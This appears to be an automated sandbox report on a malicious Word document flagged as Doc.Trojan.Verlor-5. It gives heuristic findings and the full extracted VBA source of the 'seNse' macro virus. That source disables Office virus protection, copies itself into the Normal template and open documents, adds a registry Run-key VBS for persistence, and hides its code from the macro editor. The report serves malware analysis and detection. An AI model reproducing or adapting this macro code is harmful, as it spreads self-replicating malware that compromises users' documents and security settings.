MALICIOUS
296
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains legacy WordBasic markers and VBA macros, including an Auto_Close macro. The Auto_Close macro attempts to export the current macro code to a DLL and import it into the Normal template, likely to evade detection or ensure persistence. It also attempts to establish persistence by writing a VBScript to the registry Run key: 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\seNse' pointing to 'C:\Windows\seNse.a.vbs'.
Heuristics 7
-
ClamAV: Doc.Trojan.Verlor-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Verlor-5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")" -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
windir = Environ("windir") -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5114 bytes |
SHA-256: e8ce4c985f51c522e003f1d0d25f26c51ee2fac5871bd04c5bbb7a5c2ee40f6f |
|||
|
Detection
ClamAV:
Doc.Trojan.Verlor-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoClose()
'MyName = seNse'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .A (1.2)On Error Resume Nextwindir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")
Options.VirusProtection = FalseOptions.ConfirmConversions = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("Module1").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub Stealth()
On Error Resume Next
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "f0re"
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
If Dir(windir & "\seNse.a.vbs") <> "" Then Kill (windir & "\seNse.a.vbs")
If Dir(windir & "\seNse.a.dll") <> "" Then Kill (windir & "\seNse.a.dll")
Open "c:\windows\seNse.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module1" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.a.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\seNse.a.dll")
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Code = Code & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = TrueDocnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
While Application.ShowVisualBasicEditor = TrueDoEventsWend
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
NormalTemplate.SaveDocnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
codeNT = codeNT & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = TrueDocnumber = Application.Documents.Count
If Docnumber >= 1 Then
For Y = 1 To ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.Lines(Y, 1) & Chr(13)
Next Y
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.Dialogs(wdDialogToolsMacro).Show
If Application.ShowVisualBasicEditor = False Then
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, codeNT
NormalTemplate.Save
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End If
End Sub
'Put this code in a Module1 called "Module1". I created a form of stealth.
'However not full stealth. But it's a nice attempt i think/hope :).
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.